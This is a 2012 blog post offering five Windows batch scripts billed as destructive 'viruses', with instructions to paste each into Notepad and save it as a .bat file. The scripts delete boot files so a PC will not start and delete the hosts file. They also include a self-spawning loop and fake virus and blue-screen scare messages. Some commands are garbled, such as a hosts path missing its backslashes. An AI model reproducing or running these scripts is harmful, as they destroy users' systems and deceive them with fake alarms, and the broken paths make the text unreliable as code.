Sunday 21 October 2012

DESTRUCTIVE BATCH FILES - 3



1.

Batch File Code:Delete windows

1.open your notepad.
2.copy and paste this code to your notepad given below.

@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START
 
3.save this at bat extension.example:virus.bat
this bat file can delete your windows.


 2.
DESTROY A PC BY ITS BOOTING


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save as .bat extension and see the work by yourself

3.
COMPUTER DISTROYER
 
@echo off
echo WARNING VIRUS HAS BEEN DETECTED
echo System check
echo -
echo Power - FAILED
echo -
echo RAM - FAILED
echo -
echo Norton - FAILED
echo -
echo Breach of IP adress
echo -
echo Firewall - FAILED
echo -
echo Virus attaining: ****-****-****-8894
echo -
echo Hard drive must be erased and rebooted to resume windows.
echo -
PAUSE
echo -
echo Starting to reboot hardrive.
echo -
echo Do not attempt to quit.
echo -
echo Restart after 10 minutes approximately.
PAUSE
:START

save as computer destroyer.bat

4.
 INTERNET DESTROYER

@echo off
cd WINDOWSSYSTEM32DRIVERSETC
attrib hosts -r -h
del hosts

save as internet destroyer.bat

 5.
BLUE SCREEN TO DEATH
@echo off

cd /

cls

color 17

echo A problem has been detected and Windows has been shut down to prevent damage

echo to your computer.

echo.

echo The problem seems to be caused by the following file: SPCMDCON.SYS

echo.

echo PAGE_FAULT_IN_NONPAGED_AREA

echo.


echo If this is the first time you've seen this stop error screen,

echo restart your computer. If this screen appears again, follow

echo these steps:

echo.

echo Check to make sure any new hardware or software is properly installed.

echo If this is a new installation, ask your hardware or software manufacturer

echo for any Windows updates you might need.

echo.

echo If problems continue, disable or remove any newly installed hardware

echo or software. Disable BIOS memory options such as caching or shadowing.

echo If you need to use Safe Mode to remove or disable components, restart

echo your computer, press F8 to select Advanced Startup Options, and then

echo select Safe Mode.

echo.

echo Technical information:

echo.

echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)

echo.

echo.

echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c

pause >nul

cls

echo Downloading viruses . . .

ping localhost -n 5 >nul

dir /s

pause >nul

save as screen.bat 

No comments:

Post a Comment